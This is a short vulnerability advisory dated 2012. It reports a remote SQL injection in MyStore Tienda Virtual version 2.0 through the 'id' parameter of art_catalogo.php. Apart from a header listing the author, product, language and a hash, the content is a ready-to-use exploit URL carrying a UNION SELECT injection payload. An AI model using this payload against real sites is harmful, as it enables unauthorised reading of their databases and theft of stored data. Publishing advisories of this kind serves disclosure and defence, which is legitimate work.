MyStore Tienda Virtual version 2.0 suffers from a remote SQL injection vulnerability.
949ed40da77608c540d9db566aa82e5ad4314c7d5ea667c7b855a897a831a89a
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
~ SQL Injection MyStore Tienda Virtual ~
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
[+] Autor: easy laster
[+] Vulnerabilities [ SQL Injection ]
[+] Page: http://www.mystore.com.mx/
[+] Language: [ PHP ]
[+] Version: 2.0
[+] Date: 03.01.2012
[+] Status:vulnerable
.-=--=--=--=--=--=--=--=--=--=--=-.
[+] Vulnerability
art_catalogo.php?id=
[+] Exploitable
http://[host]/[path]/art_catalogo.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11--+